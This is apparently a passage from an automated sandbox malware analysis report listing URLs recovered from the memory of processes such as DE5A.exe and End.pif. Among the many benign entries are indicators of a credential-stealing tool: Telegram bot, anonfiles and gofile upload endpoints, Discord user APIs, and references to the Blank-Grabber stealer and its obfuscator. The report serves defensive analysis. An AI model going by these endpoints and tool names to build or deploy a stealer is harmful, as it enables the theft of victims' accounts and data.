00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458495109.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458790993.000001FEA7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: DE5A.exe, 00000016.00000002.2466580305.000001F0127FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495793287.000001E8E7918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                        Source: End.pif, 0000000A.00000003.1942049152.0000000001D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/
                        Source: End.pif, 0000000A.00000003.1941664700.0000000001CF8000.00000004.00000020.00020000.00000000.sdmp, End.pif, 0000000A.00000002.1945579841.0000000001CFF000.00000004.00000020.00020000.00000000.sdmp, End.pif, 0000000A.00000002.1945641936.0000000001D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/1gFnW4
                        Source: End.pif, 0000000A.00000002.1945641936.0000000001D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/1gFnW4Zw
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                        Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                        Source: DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
                        Source: explorer.exe, 00000012.00000000.2006529919.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                        Source: explorer.exe, 00000012.00000000.2006529919.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                        Source: explorer.exe, 00000012.00000000.2003816190.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2002954132.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                        Source: explorer.exe, 00000012.00000000.2006529919.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2006529919.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                        Source: explorer.exe, 00000012.00000000.2006529919.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                        Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                        Source: DE5A.exe, 00000016.00000002.2466911052.000001F012810000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                        Source: DE5A.exe, 00000016.00000003.2418416385.000001F01269B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2414862341.000001F01269B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466580305.000001F012661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                        Source: DE5A.exe, 00000016.00000002.2468316461.000001F0130B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                        Source: DE5A.exe, 0000002E.00000002.2582736276.000001E8E78B4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495793287.000001E8E78B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapozJ
                        Source: DE5A.exe, 0000002E.00000003.2495793287.000001E8E7960000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E7960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.co
                        Source: DE5A.exe, 00000016.00000003.2419224582.000001F012E11000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2419538752.000001F01274B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2419784955.000001F012751000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2488129226.000001E8E74AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                        Source: DE5A.exe, 00000016.00000003.2412664029.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F0122D0000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2465660867.000001F010939000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2414172470.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2579154545.000001E8E552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                        Source: DE5A.exe, 00000016.00000002.2466911052.000001F012810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/f4kedre4lity/Blank-Grabber
                        Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/f4kedre4lity/Blank-Grabberi
                        Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/f4kedre4lity/Blank-Grabberr
                        Source: DE5A.exe, 00000016.00000002.2466005224.000001F01223C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                        Source: DE5A.exe, 0000002E.00000002.2579154545.000001E8E552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                        Source: DE5A.exe, 00000016.00000003.2412664029.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F0122D0000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2465660867.000001F010939000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2414172470.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2579154545.000001E8E552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                        Source: DE5A.exe, 00000016.00000002.2467155729.000001F012ACB000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2423688017.000001F012B06000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2422950901.000001F012B1F000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2422846997.000001F012BDE000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495284322.000001E8E74C1000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491101749.000001E8E78CA000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491719061.000001E8E78CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                        Source: DE5A.exe, 00000016.00000003.2412664029.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F0122D0000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2465660867.000001F010939000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2414172470.000001F0122FD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2579154545.000001E8E552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                        Source: DE5A.exe, 00000016.00000002.2468316461.000001F0130B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                        Source: DE5A.exe, 00000016.00000002.2467155729.000001F012B53000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                        Source: DE5A.exe, 0000002E.00000002.2586962906.000001E8E7CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                        Source: DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012C8B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495670769.000001E8E7A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                        Source: DE5A.exe, 00000016.00000002.2466580305.000001F0127A5000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495670769.000001E8E7A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                        Source: DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: DE5A.exe, 00000016.00000002.2467155729.000001F012C8B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E78B4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495793287.000001E8E78B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                        Source: DE5A.exe, 00000016.00000002.2467155729.000001F012C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                        Source: DE5A.exe, 00000016.00000002.2466580305.000001F0127A5000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012ACB000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466580305.000001F012661000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491345311.000001E8E7057000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2492104462.000001E8E743C000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E76F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                        Source: DE5A.exe, 00000016.00000003.2418416385.000001F01269B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2414862341.000001F01269B000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466911052.000001F012810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                        Source: DE5A.exe, 00000016.00000002.2470814485.00007FFDFB7F2000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                        Source: DE5A.exe, 00000016.00000002.2466473798.000001F012510000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2580469572.000001E8E71F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/f4kedre4lity/Blank-Grabber/main/.github/workflows/image.png
                        Source: DE5A.exe, 0000002E.00000002.2580469572.000001E8E71F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/f4kedre4lity/Blank-Grabber/main/.github/workflows/image.pngpo
                        Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/f4kedre4lity/Blank-Grabber/main/.github/workflows/image.pngz
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                        Source: DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466580305.000001F012661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                        Source: DE5A.exe, 00000016.00000003.2423688017.000001F012B7D000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012B9A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2424209134.000001F012BBD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012B53000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2491719061.000001E8E78A6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E76F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
                        Source: DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467155729.000001F012C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                        Source: DE5A.exe, 00000016.00000002.2468316461.000001F013120000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495793287.000001E8E7960000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2496537431.000001E8E7981000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                        Source: DE5A.exe, 0000002E.00000002.2586962906.000001E8E7CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                        Source: explorer.exe, 00000012.00000000.2010572086.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                        Source: DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2470723461.00007FFDFB3D0000.00000004.00000001.01000000.0000001A.sdmp, DE5A.exe, 00000016.00000002.2472109218.00007FFDFF308000.00000004.00000001.01000000.0000001B.sdmp, DE5A.exe, 00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2593155215.00007FFDFBAA0000.00000004.00000001.01000000.0000002A.sdmp, DE5A.exe, 0000002E.00000002.2595440875.00007FFE00568000.00000004.00000001.01000000.0000002B.sdmpString found in binary or memory: https://www.openssl.org/H
                        Source: DE5A.exe, 00000016.00000003.2413911637.000001F0123A1000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466005224.000001F0121C0000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 00000016.00000003.2413695668.000001F01239C000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2479834858.000001E8E72F9000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2579425676.000001E8E6E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2470814485.00007FFDFB8F7000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.python.org/psf/license/
                        Source: DE5A.exe, 00000016.00000002.2470814485.00007FFDFB7F2000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.python.org/psf/license/)
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
